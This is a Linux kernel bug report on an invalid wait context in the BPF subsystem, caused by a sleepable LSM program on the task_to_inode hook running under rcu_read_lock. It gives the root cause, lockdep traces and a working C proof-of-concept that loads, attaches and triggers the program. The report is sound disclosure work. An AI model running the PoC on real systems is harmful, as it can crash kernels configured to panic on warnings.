Our fuzzing discovered an invalid wait context vulnerability in the
Linux kernel's BPF subsystem. The vulnerability occurs when a sleepable
BPF program (`BPF_F_SLEEPABLE`) is attached to an LSM hook that is
invoked from an atomic context, resulting in a conflicting lock state.
Reported-by: Quan Sun <
202209...@std.uestc.edu.cn>
Reported-by: Yinhao Hu <
ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <
M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <
dz...@hust.edu.cn>
## Root Cause
This vulnerability stems from a conflict between the kernel's lock
context (specifically the RCU read lock in procfs) and the wait
semantics of a "sleepable" BPF LSM program.
When attaching an eBPF program of type `BPF_PROG_TYPE_LSM` with the
`BPF_F_SLEEPABLE` flag to certain kernel hooks such as
`bpf_lsm_task_to_inode`, the execution operates through the BPF
trampoline. Sleepable programs require executing
`__bpf_prog_enter_sleepable()` before entering the main program
instructions.
1. **RCU Read-Side Context**: The execution path that reaches the target
LSM hook (`security_task_to_inode`) originates from `pid_revalidate()`
in `fs/proc/base.c`. Crucially, `pid_revalidate()` runs while holding
`rcu_read_lock()`, placing execution in a non-sleepable context under an
RCU read-side critical section.
2. **Sleepable Trampoline Fault Check**: The trampoline's enter
mechanism for a sleepable program calls `__might_fault()`, which
internally invokes `__might_resched()`.
3. **Lockdep Violation**: By entering a sleepable boundary (i.e.
potentially triggering a sleep/resched operation) within the middle of
an RCU critical section (`rcu_read_lock`), the kernel hits a conflicting
wait context. The lockdep system detects this violation and aborts
execution, triggering the `BUG: sleeping function called from invalid
context` warning, followed by a `BUG: Invalid wait context` error
tracing back to `__might_fault`.
#### Execution Flow Visualization
```text
Vulnerability Execution Flow
|
|--- 1. bpf(BPF_PROG_LOAD, ...) syscall execution
| |
| -> Load a sleepable BPF_PROG_TYPE_LSM program (with BPF_F_SLEEPABLE
flag)
|
|--- 2. bpf(BPF_RAW_TRACEPOINT_OPEN, ...) syscall execution
| |
| -> Attach program to the bpf_lsm_task_to_inode LSM hook
|
|--- 3. Trigger target hook (syscall(SYS_utimensat, ...))
| |
| -> pid_revalidate() (in fs/proc/base.c)
| |
| -> Acquires rcu_read_lock() (entering non-sleepable RCU
read-side critical section)
| -> pid_update_inode()
| |
| -> security_task_to_inode()
| |
| -> BPF trampoline executed (bpf_trampoline_...)
| |
| -> __bpf_prog_enter_sleepable()
| |
| -> __might_fault() -> __might_resched()
| -> LOCKDEP detects sleeping function in
non-sleepable context
| -> Triggers BUG: sleeping function called from
invalid context
```
## Reproduction Steps
1. **BPF Program Setup**: Prepare an eBPF program of type
`BPF_PROG_TYPE_LSM` with the `BPF_F_SLEEPABLE` flag set (`prog_flags =
0x5b` includes the sleepable logic flag). Ensure the `attach_btf_id`
targets the `bpf_lsm_task_to_inode` hook.
2. **Load and Attach**: Call `bpf(BPF_PROG_LOAD, ...)` to load the
program into the kernel, and call `bpf(BPF_RAW_TRACEPOINT_OPEN, ...)` to
attach it effectively to the LSM hook.
3. **Trigger the Atomic Context**: Use a syscall that triggers a
`/proc/self` state update, such as `syscall(SYS_utimensat, 0,
"/proc/self", NULL, 0)`.
4. **Trigger Warning/BUG**: At this point, the filesystem subsystem
validates the PID node metadata and enters an RCU read-side section.
During the update, the `security_task_to_inode` BPF hook runs and
invokes the sleepable entry path, triggering lockdep reports such as
`BUG: sleeping function called from invalid context` and `BUG: Invalid
wait context`. If `panic_on_warn` is enabled, this may escalate to a
kernel panic.
## BUG Report
```text
[ 355.262951][ T9821] BUG: sleeping function called from invalid
context at kern5
[ 355.264934][ T9821] in_atomic(): 0, irqs_disabled(): 0, non_block: 0,
pid: 9821, name: poc2
[ 355.266503][ T9821] preempt_count: 0, expected: 0
[ 355.267497][ T9821] RCU nest depth: 2, expected: 0
[ 355.268474][ T9821] 3 locks held by poc2/9821:
[ 355.269352][ T9821] #0: ffffffff8f5cea20
(rcu_read_lock){....}-{1:3}, at: path_init+0xa61/0x1ab0
[ 355.273666][ T9821] #1: ffffffff8f5cea20
(rcu_read_lock){....}-{1:3}, at: pid_revalidate+0x2e/0x2c0
[ 355.275547][ T9821] #2: ffffffff8f5cd998
(rcu_tasks_trace_srcu_struct){....}-{0:0}, at: __bpf_prog_ente0
[ 355.277492][ T9821] CPU: 1 UID: 0 PID: 9821 Comm: poc2 Tainted: G
W 7.0.0-rc5-g6f6c794d
[ 355.277517][ T9821] Tainted: [W]=WARN
[ 355.277522][ T9821] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX +
PIIX, arch_caps fix, 1996), BIOS 1.4
[ 355.277536][ T9821] Call Trace:
[ 355.277554][ T9821] <TASK>
[ 355.277564][ T9821] dump_stack_lvl+0x164/0x1f0
[ 355.277599][ T9821] __might_resched+0x32f/0x540
[ 355.277629][ T9821] __might_fault+0x8b/0x140
[ 355.277649][ T9821] __bpf_prog_enter_sleepable+0x193/0x360
[ 355.277679][ T9821] bpf_trampoline_6442657570+0x5b/0xdf
[ 355.277703][ T9821] security_task_to_inode+0x7d/0x140
[ 355.277724][ T9821] pid_revalidate+0x12f/0x2c0
[ 355.277743][ T9821] lookup_fast+0x399/0x610
[ 355.277773][ T9821] path_lookupat+0x1e1/0xc40
[ 355.277804][ T9821] filename_lookup+0x1e4/0x560
[ 355.277834][ T9821] ? __pfx_filename_lookup+0x10/0x10
[ 355.277871][ T9821] ? __pfx_kfree_link+0x10/0x10
[ 355.277900][ T9821] ? __might_fault+0xc1/0x140
[ 355.277919][ T9821] ? strncpy_from_user+0x1a0/0x2d0
[ 355.277947][ T9821] ? do_getname+0x1aa/0x3a0
[ 355.277972][ T9821] do_utimes_path+0xd9/0x1a0
[ 355.277995][ T9821] ? __pfx_do_utimes_path+0x10/0x10
[ 355.278025][ T9821] do_utimes+0x39/0x110
[ 355.278047][ T9821] __x64_sys_utimensat+0x1a0/0x260
[ 355.278071][ T9821] ? __pfx___x64_sys_utimensat+0x10/0x10
[ 355.278093][ T9821] ? xfd_validate_state+0x67/0x190
[ 355.278127][ T9821] do_syscall_64+0x112/0xf80
[ 355.278148][ T9821] ? clear_bhb_loop+0x40/0x90
[ 355.278171][ T9821] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 355.278189][ T9821] RIP: 0033:0x421f8d
[ 355.278203][ T9821] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3
0f 1e fa 48 89 f8 48 89 f7 48 89 d6 8
[ 355.278219][ T9821] RSP: 002b:00007ffe2516ef38 EFLAGS: 00000202
ORIG_RAX: 0000000000000118
[ 355.278241][ T9821] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
0000000000421f8d
[ 355.278252][ T9821] RDX: 0000000000000000 RSI: 0000000000487099 RDI:
0000000000000000
[ 355.278261][ T9821] RBP: 00007ffe2516ef50 R08: 0000000000000003 R09:
0000000000000003
[ 355.278271][ T9821] R10: 0000000000000000 R11: 0000000000000202 R12:
00007ffe2516f068
[ 355.278281][ T9821] R13: 00007ffe2516f078 R14: 00000000004ae868 R15:
0000000000000001
[ 355.278306][ T9821] </TASK>
[ 355.278314][ T9821]
[ 355.318887][ T9821] =============================
[ 355.319673][ T9821] [ BUG: Invalid wait context ]
[ 355.320436][ T9821] 7.0.0-rc5-g6f6c794d0ff0 #3 Tainted: G W
[ 355.321596][ T9821] -----------------------------
[ 355.322354][ T9821] poc2/9821 is trying to lock:
[ 355.323122][ T9821] ffff8881036d4cc0 (&mm->mmap_lock){++++}-{4:4},
at: __might_fault+0xc1/0x140
[ 355.324811][ T9821] other info that might help us debug this:
[ 355.326246][ T9821] context-{5:5}
[ 355.327170][ T9821] 3 locks held by poc2/9821:
[ 355.328137][ T9821] #0: ffffffff8f5cea20
(rcu_read_lock){....}-{1:3}, at: path_init+0xa61/0x1ab0
[ 355.329954][ T9821] #1: ffffffff8f5cea20
(rcu_read_lock){....}-{1:3}, at: pid_revalidate+0x2e/0x2c0
[ 355.331606][ T9821] #2: ffffffff8f5cd998
(rcu_tasks_trace_srcu_struct){....}-{0:0}, at: __bpf_prog_ente0
[ 355.333392][ T9821] stack backtrace:
[ 355.333976][ T9821] CPU: 1 UID: 0 PID: 9821 Comm: poc2 Tainted: G
W 7.0.0-rc5-g6f6c794d
[ 355.334000][ T9821] Tainted: [W]=WARN
[ 355.334005][ T9821] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX +
PIIX, arch_caps fix, 1996), BIOS 1.4
[ 355.334016][ T9821] Call Trace:
[ 355.334046][ T9821] <TASK>
[ 355.334056][ T9821] dump_stack_lvl+0x10e/0x1f0
[ 355.334078][ T9821] __lock_acquire+0x96e/0x25f0
[ 355.334102][ T9821] lock_acquire+0x1c9/0x370
[ 355.334118][ T9821] ? __might_fault+0xc1/0x140
[ 355.334135][ T9821] ? dump_stack_lvl+0x19b/0x1f0
[ 355.334155][ T9821] ? __might_fault+0xc1/0x140
[ 355.334170][ T9821] __might_fault+0xda/0x140
[ 355.334184][ T9821] ? __might_fault+0xc1/0x140
[ 355.334200][ T9821] __bpf_prog_enter_sleepable+0x193/0x360
[ 355.334225][ T9821] bpf_trampoline_6442657570+0x5b/0xdf
[ 355.334242][ T9821] security_task_to_inode+0x7d/0x140
[ 355.334262][ T9821] pid_revalidate+0x12f/0x2c0
[ 355.334278][ T9821] lookup_fast+0x399/0x610
[ 355.334305][ T9821] path_lookupat+0x1e1/0xc40
[ 355.334331][ T9821] filename_lookup+0x1e4/0x560
[ 355.334359][ T9821] ? __pfx_filename_lookup+0x10/0x10
[ 355.334390][ T9821] ? __pfx_kfree_link+0x10/0x10
[ 355.334417][ T9821] ? __might_fault+0xc1/0x140
[ 355.334433][ T9821] ? strncpy_from_user+0x1a0/0x2d0
[ 355.334460][ T9821] ? do_getname+0x1aa/0x3a0
[ 355.334492][ T9821] do_utimes_path+0xd9/0x1a0
[ 355.334513][ T9821] ? __pfx_do_utimes_path+0x10/0x10
[ 355.334539][ T9821] do_utimes+0x39/0x110
[ 355.334560][ T9821] __x64_sys_utimensat+0x1a0/0x260
[ 355.334582][ T9821] ? __pfx___x64_sys_utimensat+0x10/0x10
[ 355.334603][ T9821] ? xfd_validate_state+0x67/0x190
[ 355.334632][ T9821] do_syscall_64+0x112/0xf80
[ 355.334652][ T9821] ? clear_bhb_loop+0x40/0x90
[ 355.334672][ T9821] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 355.334689][ T9821] RIP: 0033:0x421f8d
[ 355.334704][ T9821] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3
0f 1e fa 48 89 f8 48 89 f7 48 89 d6 8
[ 355.334720][ T9821] RSP: 002b:00007ffe2516ef38 EFLAGS: 00000202
ORIG_RAX: 0000000000000118
[ 355.334735][ T9821] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
0000000000421f8d
[ 355.334745][ T9821] RDX: 0000000000000000 RSI: 0000000000487099 RDI:
0000000000000000
[ 355.334755][ T9821] RBP: 00007ffe2516ef50 R08: 0000000000000003 R09:
0000000000000003
[ 355.334765][ T9821] R10: 0000000000000000 R11: 0000000000000202 R12:
00007ffe2516f068
[ 355.334775][ T9821] R13: 00007ffe2516f078 R14: 00000000004ae868 R15:
0000000000000001
[ 355.334794][ T9821] </TASK>
```
## PoC (`poc.c`)
The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3)
### How BTF_ID is obtained
The PoC uses `BPF_PROG_TYPE_LSM`, so `attach_btf_id` must be the
function BTF ID from the exact running kernel image (the `vmlinux` used
by the VM). In this report, `BTF_ID = 206229` maps to
`bpf_lsm_task_to_inode`.
You can get it with:
```bash
bpftool btf dump file /path/to/vmlinux | grep "FUNC 'bpf_lsm_task_to_inode'"
```
Example output:
```text
[206229] FUNC 'bpf_lsm_task_to_inode' type_id=55362 linkage=static
```
Note: BTF IDs are build-specific. If kernel source/config/compiler
changes, this ID may change and must be re-queried.
```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) \
*(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off),
(bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
int main(int argc, char **argv)
{
uint32_t attach_btf_id = 206229; // Default BTF ID for commit
6f6c794d0ff0
if (argc > 1) {
attach_btf_id = (uint32_t)atoi(argv[1]);
printf("[+] Using user-provided attach_btf_id: %u\n",
attach_btf_id);
} else {
printf("[*] Usage: %s [attach_btf_id]\n", argv[0]);
printf("[*] To extract BTF ID on target kernel, run:\n");
printf("[*] bpftool btf dump file /sys/kernel/btf/vmlinux |
grep \"FUNC 'bpf_lsm_task_to_inode'\"\n");
printf("[*] Using default attach_btf_id: %u\n", attach_btf_id);
}
// Syzkaller requires fixed memory mappings for generating payloads
syscall(__NR_mmap, (void*)0x1ffffffff000ul, 0x1000ul, 0ul,
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0ul);
syscall(__NR_mmap, (void*)0x200000000000ul, 0x1000000ul,
PROT_WRITE|PROT_READ|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1,
0ul);
syscall(__NR_mmap, (void*)0x200001000000ul, 0x1000ul, 0ul,
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0ul);
intptr_t res = 0;
uint64_t r_prog = 0xffffffffffffffff;
// Set up bpf_attr for BPF_PROG_LOAD
*(uint32_t*)0x2000000009c0 = 0x1d; // prog_type: BPF_PROG_TYPE_LSM
*(uint32_t*)0x2000000009c4 = 1; // insn_cnt
*(uint64_t*)0x2000000009c8 = 0x200000000a80; // insns pointer
// single bpf instruction (BPF_EXIT)
*(uint8_t*)0x200000000a80 = 0x95;
STORE_BY_BITMASK(uint8_t, , 0x200000000a81, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000000a81, 0, 4, 4);
*(uint16_t*)0x200000000a82 = 0;
*(uint32_t*)0x200000000a84 = 0;
*(uint64_t*)0x2000000009d0 = 0x200000000b00; // license pointer
memcpy((void*)0x200000000b00, "GPL\000", 4);
*(uint32_t*)0x2000000009d8 = 0; // log_level
*(uint32_t*)0x2000000009dc = 0; // log_size
*(uint64_t*)0x2000000009e0 = 0; // log_buf
*(uint32_t*)0x2000000009e8 = 0; // kern_version
*(uint32_t*)0x2000000009ec = 0x5b; // prog_flags
memset((void*)0x2000000009f0, 0, 16); // prog_name
*(uint32_t*)0x200000000a00 = 0; // prog_ifindex
*(uint32_t*)0x200000000a04 = 0x1b; // expected_attach_type: BPF_LSM_MAC
*(uint32_t*)0x200000000a08 = 0; // prog_btf_fd
*(uint32_t*)0x200000000a0c = 0; // func_info_rec_size
*(uint64_t*)0x200000000a10 = 0; // func_info
*(uint32_t*)0x200000000a18 = 0; // func_info_cnt
*(uint32_t*)0x200000000a1c = 0; // line_info_rec_size
*(uint64_t*)0x200000000a20 = 0; // line_info
*(uint32_t*)0x200000000a28 = 0; // line_info_cnt
*(uint32_t*)0x200000000a2c = attach_btf_id; // attach_btf_id
*(uint32_t*)0x200000000a30 = 0; // attach_prog_fd
*(uint32_t*)0x200000000a34 = 0; // fd_array_cnt
*(uint64_t*)0x200000000a38 = 0; // fd_array
*(uint64_t*)0x200000000a40 = 0; // core_relo_cnt
*(uint32_t*)0x200000000a48 = 0; // core_relo_rec_size
*(uint32_t*)0x200000000a4c = 0xfffffffc; // log_true_size
*(uint32_t*)0x200000000a50 = 0; // ext_group_info
printf("[+] Loading BPF Program...\n");
res = syscall(__NR_bpf, 5ul, 0x2000000009c0ul, 0x94ul); // 5 =
BPF_PROG_LOAD
if (res != -1) {
printf("[+] Verified: load success, FD: %ld\n", res);
r_prog = res;
} else {
perror("[-] BPF_PROG_LOAD failed");
return 1;
}
// Set up bpf_attr for BPF_RAW_TRACEPOINT_OPEN (Attach target logic)
*(uint64_t*)0x200000000000 = 0; // name pointer
*(uint32_t*)0x200000000008 = r_prog; // prog_fd
printf("[+] Attaching BPF...\n");
syscall(__NR_bpf, 0x11ul, 0x200000000000ul, 0x10ul); // 0x11 =
BPF_RAW_TRACEPOINT_OPEN
// Trigger logic
printf("[+] Triggering Bug...\n");
for (int i = 0; i < 50; i++) {
syscall(SYS_utimensat, 0, "/proc/self", NULL, 0);
}
printf("[+] Executed trigger, waiting to check for lockdep warnings
or panic (if panic_on_warn=1)...\n");
sleep(2);
return 0;
}
```
## Kernel Configuration Requirements for Reproduction
The vulnerability can be triggered with the kernel config in the attachment.